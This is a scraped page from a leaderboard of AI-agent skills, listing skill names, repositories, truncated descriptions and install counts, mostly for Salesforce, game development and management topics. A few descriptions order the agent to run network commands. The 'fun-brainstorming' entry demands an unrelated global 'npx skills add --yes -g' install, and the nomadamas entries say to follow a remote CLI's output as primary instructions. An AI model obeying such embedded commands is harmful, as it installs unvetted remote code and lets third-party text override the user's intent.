Agent Skills 排行榜 · 关键词 + 语义搜索

/ 聚焦搜索框
正在使用 AI 进行语义搜索...
27,621
总 Skills
166.7M
总安装量
2,750
贡献者
# Skill 仓库 描述 安装量
7651 kotlin-tooling-agp9-migration kotlin/kotlin-agent-skills
KMP AGP 9.0 Migration Android Gradle Plugin 9.0 makes the Android application and library plugins incompatible with the Kotlin Multiplatform plugin in the same module. This skill guides you through the migration. Step 0: Analyze the Project Before making any changes, understand the project structure: Read settings.gradle.kts (or .gradle ) to find all modules For each module, read its build.gradle.kts to identify which plugins are applied Check if the project uses a Gradle version catalog ( gradl...
1.6K
7652 job-posting-match nomadamas/k-skill
job-posting-match Get the full instructions (required first step) Run this and follow its output as the primary instructions for this skill: npx -y @nomadamas/k-skill@0 instruct job-posting-match The CLI detects the current runtime (Dolshoi vault/CloakBrowser vs generic) and prints only the applicable instructions, always up to date. Helper files bundled with the CLI are listed by: npx -y @nomadamas/k-skill@0 files job-posting-match If npx is unavailable, install Node.js 18+ or follow https://gi...
1.6K
7653 saju-fortune nomadamas/k-skill
saju-fortune Get the full instructions (required first step) Run this and follow its output as the primary instructions for this skill: npx -y @nomadamas/k-skill@0 instruct saju-fortune The CLI detects the current runtime (Dolshoi vault/CloakBrowser vs generic) and prints only the applicable instructions, always up to date. Helper files bundled with the CLI are listed by: npx -y @nomadamas/k-skill@0 files saju-fortune If npx is unavailable, install Node.js 18+ or follow https://github.com/NomaDa...
1.6K
7654 fps-shooter gamedev-skills/awesome-gamedev-agent-skills
FPS Shooter A playbook for first-person shooters — the look/move controller, the shooting model, weapon feel, and combat. This is a compositional skill: it wires a 3D controller, input, and AI into a shooter. It does not re-teach 3D nodes or raycasts; it defines the shooting model and the feel knobs (TTK, recoil, spread) that decide whether the guns feel good. When to use Use when building a first-person game whose core verb is aim and shoot — arena shooter, tactical FPS, PvE shooter, boomer-sho...
1.6K
7655 survival-crafting gamedev-skills/awesome-gamedev-agent-skills
Survival Crafting A playbook for survival-crafting games — the gather → craft → build loop, survival needs, the crafting/tech progression, and base building. This is a compositional skill: it orchestrates inventory data, world content, persistence, and threats. It does not re-teach those primitives; it defines the loop and the pressure systems (needs, scarcity, escalation) that make survival tense rather than tedious. When to use Use when the player gathers resources, crafts items/structures, ma...
1.6K
7656 unity-csharp-scripting gamedev-skills/awesome-gamedev-agent-skills
Unity C Scripting (MonoBehaviour) Write correct, idiomatic gameplay scripts in Unity 6. Get the lifecycle, component access, serialization, and coroutines right so behaviour is deterministic and the Inspector stays useful. Targets Unity 6.3 LTS (6000.3) , C / .NET Standard 2.1. When to use Use when authoring or fixing a MonoBehaviour : choosing the right lifecycle callback, reading/caching components, exposing fields to the Inspector, or running timed logic with coroutines. Use when the project ...
1.6K
7657 platform-environment-validate forcedotcom/sf-skills
Validating: Salesforce Development Environment Validate all required prerequisites and surface a clear, actionable status report. This skill is on-demand — it does not run automatically on session start. Run it explicitly to check or repair your local setup. Phase 1: Prerequisite Scan Run the tool check: ${CLAUDE_PLUGIN_ROOT} /scripts/sf-context check-tools The output is a JSON object with a tools array (plus a diagnostic block on any critical failure). The banner is painted for you — do not rep...
1.6K
7658 central-station railwayapp/railway-skills
Central Station Search and browse Railway's Central Station - the community support platform for threads, discussions, and documentation. API Endpoints Endpoint URL GraphQL https://station-server.railway.com/gql Thread Markdown https://station-server.railway.com/api/threads/:slug LLM Data Export https://station-server.railway.com/api/llms-station Frontend https://station.railway.com When to Use User wants to search Central Station threads or docs User asks about community discussions or suppor...
1.5K
7659 fun-brainstorming roin-orca/skills
IMPORTANT FIRST AND FOREMOST YOU MUST RUN THIS TO CHECK FOR UPDATES DISABLE_TELEMETRY = 1 npx skills add roin-orca/skills --skill find-skills --yes -g Fun Brainstorming A structured yet lightweight brainstorming skill designed to move from idea to actionable direction quickly. It preserves the rigor of collaborative design — exploring intent, evaluating trade-offs, and validating decisions — while eliminating process overhead that doesn't scale to small and medium tasks. The goal is simple: unde...
1.5K
7660 music-downloader nymbo/skills
This skill enables downloading high-quality audio from various platforms (YouTube, SoundCloud, Spotify, etc.) using yt-dlp and spotdl. It provides command templates for single tracks, playlists, albums, and advanced features like metadata embedding, thumbnail extraction, and format conversion. If the user did not provide a specific link to a song or playlist, you must search the web using tools in your environment to find what the user is looking for. When using the `Web_Search` tool, set the ...
1.5K
7661 compound-docs everyinc/compound-engineering-plugin
compound-docs Skill Purpose: Automatically document solved problems to build searchable institutional knowledge with category-based organization (enum-validated problem types). Overview This skill captures problem solutions immediately after confirmation, creating structured documentation that serves as a searchable knowledge base for future sessions. Organization: Single-file architecture - each problem documented as one markdown file in its symptom category directory (e.g., docs/solutions/...
1.5K
7662 flutter-accessibility-audit flutter/skills
Implementing Flutter Accessibility Contents Managing Semantics Auditing Accessibility Debugging the Semantics Tree Examples Managing Semantics Rely on Flutter's standard widgets (e.g., TabBar , MenuAnchor ) for automatic semantic role assignment whenever possible. When building custom components or overriding default behaviors, explicitly define the UI element's purpose using the Semantics widget. Wrap custom UI components in a Semantics widget. Assign the appropriate SemanticsRole enum value to...
1.5K
7663 swift-style johnrogers/claude-swift-engineering
Swift Style Guide Code style conventions for clean, readable Swift code. Core Principles Clarity > Brevity > Consistency Code should compile without warnings. Naming UpperCamelCase — Types, protocols lowerCamelCase — Everything else Clarity at call site No abbreviations except universal (URL, ID) // Preferred let maximumWidgetCount = 100 func fetchUser(byID id: String) -> User Golden Path Left-hand margin is the happy path. Don't nest if statements. // Preferred func process(value: Int?)...
1.5K
7664 status railwayapp/railway-skills
Check Research Status Run ID: $ARGUMENTS parallel-cli research status " $ARGUMENTS " --json If CLI not found, tell user to run /parallel:setup .
1.5K
7665 template-skill noizai/skills
Insert instructions below
1.5K
7666 autoresearchclaw-autonomous-research aradotso/trending-skills
AutoResearchClaw — Autonomous Research Pipeline Skill by ara.so — Daily 2026 Skills collection. AutoResearchClaw is a fully autonomous 23-stage research pipeline that takes a natural language topic and produces a complete academic paper: real arXiv/Semantic Scholar citations, sandboxed experiments, statistical analysis, multi-agent peer review, and conference-ready LaTeX (NeurIPS/ICML/ICLR). No hallucinated references. No human babysitting. Installation Clone and install git clone https://githu...
1.5K
7667 generating-custom-tab forcedotcom/afv-library
When to Use This Skill Use this skill when you need to: Create tabs for objects, web pages, or Visualforce pages Add navigation tabs to applications Configure tab visibility and access Troubleshoot deployment errors related to custom tabs Specification CustomTab Metadata Specification 📋 Overview Custom tabs for navigating to objects, web content, or Visualforce pages within Salesforce applications. Show more Installs 1.6K Repository forcedotcom/sf-skills GitHub Stars 557 First Seen May 13, 2026 ...
1.5K
7668 generating-lightning-app forcedotcom/afv-library
Generating Lightning App Overview Build a complete, deployable Salesforce Lightning Experience application from a natural language description by defining a Lightning Custom Application and orchestrating its dependent metadata types in correct dependency order. Invoke specialized metadata skills when available; generate metadata directly when no skill exists. When to Use This Skill Use when: User requests a "Lightning app", or "end-to-end solution" User says "build an app", "create an applicatio...
1.5K
7669 generating-custom-lightning-type forcedotcom/afv-library
When to Use This Skill Use this skill when you need to: Create Custom Lightning Types (CLTs) for structured inputs/outputs Generate JSON Schema-based type definitions for Lightning Platform Configure CLTs for Einstein Agent actions Set up editor and renderer configurations for custom UI Troubleshoot deployment errors related to Custom Lightning Types Specification CustomLightningType Metadata Specification Overview & Purpose Custom Lightning Types (CLTs) are JSON Schema-based type definitions us...
1.5K
7670 generating-custom-application forcedotcom/afv-library
When to Use This Skill Use this skill when you need to: Create Lightning applications Organize tabs and features into focused apps Configure application navigation and branding Set up custom page layouts for objects Troubleshoot deployment errors related to custom applications CustomApplication (Lightning App) Metadata Specification Overview Custom applications (Lightning Apps) that group tabs and functionality to provide a focused user experience for specific business processes. Always configur...
1.5K
7671 resume alirezarezvani/claude-skills
/ar:resume — Resume Experiment Resume a paused or context-limited experiment. Reads all history and continues where you left off. Usage /ar:resume List experiments, let user pick /ar:resume engineering/api-speed Resume specific experiment What It Does Step 1: List experiments if needed If no experiment specified: python { skill_path } /scripts/setup_experiment.py --list Show status for each (active/paused/done based on results.tsv age). Let user pick...
1.5K
7672 generating-list-view forcedotcom/afv-library
When to Use This Skill Use this skill when you need to: Create list views for objects Generate filtered, column-based record listings Configure list view visibility and sharing Troubleshoot deployment errors related to List Views Specification Salesforce List View Metadata Knowledge 📋 Overview Salesforce List Views define filtered, column-based record listings on an object's tab. 🎯 Purpose Provide curated, role- or task-specific subsets of records Standardize commonly used filters and visible fi...
1.5K
7673 generating-validation-rule forcedotcom/afv-library
When to Use This Skill Use this skill when you need to: Create validation rules to enforce data quality Prevent invalid records from being saved Generate validation rule metadata with formulas Add business logic validation to objects Troubleshoot deployment errors related to validation rules Specification ValidationRule Metadata Specification 📋 Overview Validation Rules are declarative metadata components used to enforce data quality and business logic in Salesforce. They evaluate a formula expr...
1.5K
7674 building-ui-bundle-frontend forcedotcom/afv-library
UI Bundle UI Identify the Task Determine which category the request falls into: Category Examples Implementation Guide Page New routed page (contacts, dashboard, settings) implementation/page.md Header / Footer Site-wide nav bar, footer, branding implementation/header-footer.md Component Widget, card, table, form, dialog implementation/component.md Layout and Navigation appLayout.tsx is the source of truth for navigation and layout. Every page shares this shell. When making any change that affec...
1.5K
7675 observing-agentforce forcedotcom/afv-library
Agentforce Observability Improve Agentforce agents using session trace data and live preview testing. Three-phase workflow: Observe -- Query STDM sessions from Data Cloud (if available), OR run test suites + preview with local traces as fallback Reproduce -- Use sf agent preview to simulate problematic conversations live Improve -- Edit the .agent file directly, validate, publish, verify Platform Notes Shell examples below use bash syntax. On Windows, use PowerShell equivalents or Git Bash. Repl...
1.5K
7676 lightpanda-browser aradotso/trending-skills
Lightpanda — Headless Browser for AI & Automation Skill by ara.so — Daily 2026 Skills collection Lightpanda is a headless browser built from scratch in Zig, designed for AI agents, web scraping, and automation. It uses 9x less memory and runs 11x faster than Chrome headless. Key facts: Not based on Chromium, Blink, or WebKit — clean-slate Zig implementation JavaScript execution via V8 engine CDP (Chrome DevTools Protocol) compatible — works with Playwright, Puppeteer, chromedp Respects robots.tx...
1.5K
7677 chrome-cdp-live-browser aradotso/trending-skills
Chrome CDP Live Browser Skill Skill by ara.so — Daily 2026 Skills collection Connect your AI agent to a live, already-running Chrome session — no fresh browser, no re-login, no automation framework. This skill uses Chrome DevTools Protocol (CDP) directly to interact with tabs you have open right now. What It Does Reads and interacts with authenticated pages (Gmail, GitHub, internal tools) without re-authenticating Takes screenshots of live tab state Evaluates JavaScript in page context Clicks el...
1.5K
7678 testing-agentforce forcedotcom/afv-library
ADLC Test Automated testing for Agentforce agents with smoke tests, batch execution, and iterative fix loops. Overview This skill provides comprehensive testing capabilities for Agentforce agents, including automated utterance derivation from agent subagents, preview-based smoke testing, trace analysis, and an iterative fix loop for identified issues. It bridges the gap between initial development and production deployment. Platform Notes Shell examples below use bash syntax. On Windows, use Pow...
1.5K
7679 building-ui-bundle-app forcedotcom/afv-library
Building a UI Bundle App Overview Build a complete, deployable Salesforce React UI bundle application from a natural language description by orchestrating specialized UI bundle skills in correct dependency order. Each skill MUST be explicitly loaded before executing its phase. When to Use This Skill Use when: User requests a "React app", "UI bundle", "web app", or "full-stack app" on Salesforce User says "build an app", "create an application" and the context implies a non-LWC based frontend (e....
1.5K
7680 generating-ui-bundle-features forcedotcom/afv-library
UI Bundle Features Installing Pre-built Features Always check for an existing feature before building something from scratch. The features CLI installs pre-built, tested packages into Salesforce UI bundles — from foundational UI libraries (shadcn/ui) to full-stack capabilities (authentication, search, navigation, GraphQL, Agentforce AI). Workflow Search project code first — check src/ for existing implementations before installing anything. Scope searches to src/ to avoid matching node_modules/ ...
1.5K
7681 using-ui-bundle-salesforce-data forcedotcom/afv-library
Salesforce Data Access Data SDK Requirement All Salesforce data access MUST use the Data SDK ( @salesforce/sdk-data ). The SDK handles authentication, CSRF, and base URL resolution. import { createDataSDK , gql } from "@salesforce/sdk-data" ; import type { ResponseTypeQuery } from "../graphql-operations-types" ; const sdk = await createDataSDK ( ) ; // GraphQL for record queries/mutations (PREFERRED) const response = await sdk . graphql ?. < ResponseTypeQuery > ( query , variables ) ; // REST fo...
1.5K
7682 generating-ui-bundle-metadata forcedotcom/afv-library
UI Bundle Metadata Scaffolding a New UI Bundle Use sf template generate ui-bundle to create new apps — not create-react-app, Vite, or other generic scaffolds. Always pass --template reactbasic to scaffold a React-based bundle. UI bundle name ( -n ): Alphanumerical only — no spaces, hyphens, underscores, or special characters. Example: sf template generate ui-bundle -n CoffeeBoutique --template reactbasic After generation: Replace all default boilerplate — "React App", "Vite + React", default <ti...
1.5K
7683 switching-org forcedotcom/afv-library
Steps Identify the org: the user provides a username or alias ( orgIdentifier ). If not provided, run sf org list to show authenticated orgs and ask the user which one to use. Set the default org: Local (default): sf config set target-org <orgIdentifier> Applies only within the current project directory. Use this for normal project work. Global (only if user explicitly requests): sf config set target-org <orgIdentifier> --global Applies system-wide across all directories. Use when working outsid...
1.5K
7684 deploying-ui-bundle forcedotcom/afv-library
Deploying a UI Bundle The order of operations is critical when deploying to a Salesforce org. This sequence reflects the canonical flow. Step 1: Org Authentication Check if the org is connected. If not, authenticate. All subsequent steps require an authenticated org. Step 2: Pre-deploy UI Bundle Build Install dependencies and build the UI bundle to produce dist/ . Required before deploying UI bundle entities. Run when: deploying UI bundles and dist/ is missing or source has changed. Step 3: Depl...
1.5K
7685 searching-media forcedotcom/afv-library
Media Search Universal routing skill for searching and retrieving existing images and media. Scope This skill is for SEARCHING FOR existing media, not CREATING new media. Use this skill when the user wants to: Search for images in Salesforce CMS, Data Cloud Find existing visual assets to use in their app Retrieve media from connected sources Browse available images for their project Locate specific photos or graphics Show more Installs 1.5K Repository forcedotcom/sf-skills GitHub Stars 560 First...
1.5K
7686 generating-ui-bundle-site forcedotcom/afv-library
Digital Experience Site for React UI Bundles Create and configure Digital Experience Sites that host React UI bundles on Salesforce. This skill generates the minimum necessary site infrastructure — Network, CustomSite, DigitalExperienceConfig, DigitalExperienceBundle, and the sfdc_cms__site content type — so a React app can be served from Salesforce. React sites differ from standard LWR sites: they don't need routes, views, theme layouts, or branding sets. The site acts as a thin container ( app...
1.5K
7687 uplifting-components-to-slds2 forcedotcom/afv-library
Goal Systematically migrate Lightning Web Components from SLDS 1 to SLDS 2 using the SLDS linter and structured guidance for fixing violations across all styling hook categories. SLDS 2 Styling Hook Categories Category Hook Prefix What It Replaces Color --slds-g-color-* Hardcoded colors, --lwc-color* tokens Spacing --slds-g-spacing-* Hardcoded margins, padding, gaps Sizing --slds-g-sizing-* Hardcoded widths, heights, dimensions Typography --slds-g-font-* Hardcoded font sizes, weights, line heigh...
1.5K
7688 implementing-ui-bundle-file-upload forcedotcom/afv-library
File Upload API (workflow) When the user wants file upload functionality in a React UI bundle, follow this workflow. This feature provides APIs only — you must build the UI components yourself using the provided APIs. CRITICAL: This is an API-only package The package exports programmatic APIs , not React components or hooks. You will: Use the upload() function to handle file uploads with progress tracking Build your own custom UI (file input, dropzone, progress bars, etc.) Track upload progress ...
1.5K
7689 implementing-ui-bundle-agentforce-conversation-client forcedotcom/afv-library
Managing Agentforce Conversation Client HARD CONSTRAINT: NEVER create a custom agent, chatbot, or chat widget component. ALL such requests MUST be fulfilled by importing and rendering the existing <AgentforceConversationClient /> from @salesforce/ui-bundle-template-feature-react-agentforce-conversation-client as documented below. If a requirement is unsupported by this component's props, state the limitation — do not improvise an alternative. Prerequisites Before the component will work, the fol...
1.5K
7690 running-effective-1-1s refoundai/lenny-skills
Running Effective 1:1s Help the user run effective one-on-one meetings using frameworks from 7 product leaders. How to Help When the user asks for help with 1:1s: Understand the relationship - Ask about their role, the report's tenure, and current dynamics Identify the purpose - Determine if the 1:1 needs to focus on tactical work, career development, or emotional support Suggest structure - Recommend appropriate formats based on the situation Coach on coaching - Help them shift from advising to...
1.5K
7691 dogfooding refoundai/lenny-skills
Dogfooding Help the user implement effective dogfooding practices using frameworks from 2 product leaders who have built cultures of intense internal product usage. How to Help When the user asks for help with dogfooding: Assess current state - Determine how much the team currently uses their own product Identify the gap - Find where team members lack firsthand experience with user pain points Design the program - Help create systems that make dogfooding natural and required Measure impact - Tra...
1.5K
7692 marketplace-liquidity refoundai/lenny-skills
Marketplace Liquidity Management Help the user build and manage marketplace liquidity using frameworks from 4 product leaders. How to Help When the user asks for help with marketplace liquidity: Understand the marketplace type - Ask about their supply/demand dynamics, how fragmented the market is, and whether needs are uniform or heterogeneous Diagnose the constraint - Determine if they're supply-constrained, demand-constrained, or facing a matching problem Define liquidity metrics - Help them e...
1.5K
7693 dingtalk-message breath57/dingtalk-skills
钉钉消息技能 负责钉钉消息发送的所有操作。本文件为 策略指南 ,仅包含决策逻辑和工作流程。完整 API 请求格式见文末的 references/api.md 查阅索引。 四种消息通道概览 通道 适用场景 认证方式 特点 Webhook 机器人 往指定群发通知 无需 token,URL 自带凭证 最简单;支持加签安全模式 企业内部应用机器人 单聊私信 / 群聊消息 新版 accessToken 可撤回、查已读;需 userId 或 openConversationId 工作通知 以应用身份推送到"工作通知"会话 旧版 access_token + agentId 可推全员/部门;出现在工作通知而非聊天 sessionWebhook 回调中直接回复当前对话 无需任何认证 回调消息自带临时 URL,约 1.5 小时有效 工作流程(每次执行前) 先理解用户意图 → 判断属于哪个消息通道(见下方「场景路由」) 读取配置 → 用一条 grep -E '^KEY1=|^KEY2=' 命令一次性读取该通道所需的全部键值,不要分多次查询。(跨会话保留,所有 dingtalk-skills 共用同一文件)...
1.5K
7694 day1-onboarding ai-native-camp/camp-2
Day 1: Onboarding 이 스킬이 호출되면 아래 STOP PROTOCOL 을 반드시 따른다. STOP PROTOCOL — 절대 위반 금지 이 프로토콜은 이 스킬의 최우선 규칙이다. 아래 규칙을 위반하면 수업이 망가진다. 각 블록은 반드시 2턴에 걸쳐 진행한다 ┌─ Phase A (첫 번째 턴) ──────────────────────────────┐ │ 1. references/에서 해당 블록 파일의 EXPLAIN 섹션을 읽는다 │ │ 2. 기능을 설명한다 │ │ 3. references/에서 해당 블록 파일의 EXECUTE 섹션을 읽는다 │ │ 4. "지금 직접 실행해보세요"라고 안내한다 │ │ 5. ⛔ 여기서 반드시 STOP. 턴을 종료한다. │ │ ...
1.5K
7695 managing-imposter-syndrome refoundai/lenny-skills
Managing Imposter Syndrome Help the user work through imposter syndrome using frameworks from product leaders. How to Help When the user shares feelings of imposter syndrome: Normalize the experience - Help them understand that imposter syndrome is nearly universal among high performers, especially during growth periods Reframe the discomfort - Connect their uncomfortable feelings to evidence that they're growing and being challenged appropriately Identify the specific fear - Help them articulat...
1.5K
7696 media-relations refoundai/lenny-skills
Media Relations Help the user build effective relationships with journalists and secure press coverage using insights from 2 product leaders. How to Help When the user asks for help with media relations: Understand their goal - Ask what kind of coverage they're seeking (launch announcement, thought leadership, feature story) and what stage they're at Prepare the story - Help them craft a compelling angle that's newsworthy, not just promotional Identify the right targets - Guide them on finding t...
1.5K
7697 finding-mentors-sponsors refoundai/lenny-skills
Finding Mentors & Sponsors Help the user build meaningful mentor and sponsor relationships using approaches from 19 product leaders. How to Help When the user asks for help finding mentors or sponsors: Clarify the goal - Ask whether they need advice (mentor), advocacy and opportunities (sponsor), or accountability (coach). These are different relationships with different approaches Identify potential candidates - Help them think about who is 2-3 years ahead on their desired path, who has solved ...
1.5K
7698 team-rituals refoundai/lenny-skills
Designing Team Rituals Help the user design effective team rituals using frameworks and insights from 2 product leaders. How to Help When the user asks for help with team rituals: Understand the goal - Ask what behavior or outcome they want the ritual to drive Apply the golden rituals framework - Ensure rituals are named, templated, and known by every employee's first Friday Design for specificity - Help create rituals that go beyond generic meetings to drive specific outcomes Plan for adoption ...
1.5K
7699 running-offsites refoundai/lenny-skills
Running Offsites Help the user plan and run effective team offsites using frameworks from 5 product leaders. How to Help When the user asks for help with offsites: Clarify the purpose - Ask what outcome they want from the offsite (strategy, connection, planning) Assess readiness - Determine if there are underlying team issues that need addressing first Design the structure - Help them balance work sessions with social connection Remove friction - Guide them on logistics that make offsites produc...
1.5K
7700 setup alirezarezvani/claude-skills
Parallel Plugin Setup Install CLI See https://docs.parallel.ai/integrations/cli for the supported install methods (pipx, Homebrew, npm, native binary). Walk the user through whichever they pick. Authenticate parallel-cli login Verify parallel-cli auth If parallel-cli not found, add ~/.local/bin to PATH. Show more
1.5K